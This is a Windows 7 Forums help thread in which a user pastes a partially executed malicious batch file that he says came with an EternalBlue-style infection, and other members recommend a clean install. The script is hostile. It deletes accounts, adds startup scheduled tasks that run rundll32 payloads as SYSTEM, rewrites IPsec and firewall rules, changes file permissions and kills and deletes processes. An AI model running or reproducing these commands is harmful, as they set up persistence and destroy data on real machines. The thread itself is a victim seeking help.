Windows 7 Forums

Welcome to Windows 7 Forums. Our forum is dedicated to helping you find support and solutions for any problems regarding your Windows 7 PC be it Dell, HP, Acer, Asus or a custom build. We also provide an extensive Windows 7 tutorial section that covers a wide range of tips and tricks.


Windows 7: Hit with a partial of the eternalblue attack

25 Jun 2017   #1
nukeofwf

Windows 7 Ultimate x64
 
 
Hit with a partial of the eternalblue attack

Had something from mysking.
This caused the following partially executed bat file to show up:

ping 127.0.0.1 -n 10
net1 user IISUSER$ /del&net1 user IUSR_Servs /del
cacls c:\windows\twain_32\csrss.exe /e /d system&cacls c:\windows\twain_32\csrss.exe /e /d everyone&del c:\windows\twain_32\*.*
schtasks /create /tn "Mysa1" /tr "rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa" /ru "system" /sc onstart /F
schtasks /create /tn "ok" /tr "rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa" /ru "system" /sc onstart /F
netsh ipsec static add policy name=win
netsh ipsec static add filterlist name=Allowlist
netsh ipsec static add filterlist name=denylist
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=135
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=137
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=138
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=139
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=445
netsh ipsec static add filteraction name=Allow action=permit
netsh ipsec static add filteraction name=deny action=block
netsh ipsec static add rule name=deny1 policy=win filterlist=denylist filteraction=deny
netsh ipsec static set policy name=win assign=y
ver | find "5.1." > NUL && sc config SharedAccess start= auto && net start SharedAccess && netsh firewall set opmode mode=enable && netsh firewall set portopening protocol = ALL port = 445 name = 445 mode = DISABLE scope = ALL profile = ALL
@Wmic Process Where "Name='winlogon.exe' And ExecutablePath='C:\Windows\system\winlogon.exe'" Call Terminate &del C:\Windows\system\winlogon.exe
@Wmic Process Where "Name='svchost.exe' And ExecutablePath='C:\Windows\system\svchost.exe'" Call Terminate &del C:\Windows\system\svchost.exe
@Wmic Process Where "Name='svchost.exe' And ExecutablePath='C:\Windows\twain_32\svchost.exe'" Call Terminate &del C:\Windows\twain_32\svchost.exe
@Wmic Process Where "Name='csrss.exe' And ExecutablePath='C:\Windows\twain_32\csrss.exe'" Call Terminate &del C:\Windows\twain_32\csrss.exe
@Wmic Process Where "Name='csrss.exe' And ExecutablePath='C:\Windows\tasks\csrss.exe'" Call Terminate &del C:\Windows\tasks\csrss.exe
del c:\windows\debug\c2.bat
exit

I think I have a fair bit of it taken care of manually, but are there additional not immediately apparent issues?


My System SpecsSystem Spec
.
25 Jun 2017   #2
torchwood

W7 home premium 32bit/W7HP 64bit/w10 tp insider ring
 
 

Hi nukeofwf,

As that malware is kicking in IMMEDIATELY on start up, (winlogon.exe), and then infecting the 2 major elements of the OS, svchost.exe & csrss.exe, its also changing permissions, setting up scheduled tasks, re-writing firewall rules, creating a remote connection, and resetting your hosts files.
If you have not reset/cleaned all of the above the system is still infected.

I would suggest you go OFF line until you have performed a clean install.
(not sure but this might be Wannacry as its also playing around in IIS - smb1)
Im not a security/malware expert but if it was my system

Your best bet is a clean install

Roy
My System SpecsSystem Spec
25 Jun 2017   #3
Layback Bear

Windows 7 Pro. 64/SP-1
 
 

I agree with Roy a Clean Install would be my choice.

To add to that I would also do this before the Clean Install. To make sure no junk is left behind.

Disk - Clean and Clean All with Diskpart Command - Windows 7 Help Forums

Keep in mind that anything that was hooked to that computer could also be infected.


Jack
My System SpecsSystem Spec
.

25 Jun 2017   #4
nukeofwf

Windows 7 Ultimate x64
 
 

Thanks for the info, yeah I am seeing really weird things like a completely empty system directory etc.
Looks like a cold install will be the order of the day.
My System SpecsSystem Spec
Reply

 Hit with a partial of the eternalblue attack




Thread Tools




Similar help and support threads
Thread Forum
Partial cloning
Hi, I have a windows 7 64 system installed on an SSD drive (C:). Due to limited space, I've switched the location of the users folder (according to https://www.sevenforums.com/tutorials/18629-user-folders-change-default-location.html), program files and program files (x64) to another drive, which...
Backup and Restore
DDoS Attack, Changed IPs Still Under Attack
I'm being DDoS attacked. My ping was been spiking from 50 to 250+. I've tried changing my IP multiple times and I still was attacked (Note: I own 3 computers and 1 tablet). I've tried disabling startup processes, av scans, and basic rootkit scans and found nothing. However, after I uninstalled...
System Security
BSOD on new partial build
I am getting several different BSOD errors. I have gotten the following: Bad pool header Memory management page fault in non page area system services exception I have reset my bios to defaults. I installed all of the drivers from the MB disc and from the graphics cards site. :mad: ...
BSOD Help and Support
Windows 7 - partial installation?
Hi. During installing Windows 7 at home i had a problem of very slow install speed. I googled and found many people having a same problem, and many of them solved it by disabling floppy drives in bios. However, did'n work for me. I stayed for 6-7 hours trying everything i could think of, but...
Installation & Setup
Partial Boot
So I've solved the stop start, now its thrown up another problem. Started rebuilding a PC, took out the HDD, formatted in caddy, replaced, took out CPU, cleaned replaced, fitted new cooler. cleaned and replaced GPU. Switched on, all lights fans startup, screen shows Post splash screen, BUT,...
General Discussion


Our Sites

Site Links

About Us

Find Us

Windows 7 Forums is an independent web site and has not been authorized, sponsored, or otherwise approved by Microsoft Corporation. "Windows 7" and related materials are trademarks of Microsoft Corp.

Designer Media Ltd

All times are GMT -5. The time now is 18:00.
Twitter Facebook Google+ Seven Forums iOS App Seven Forums Android App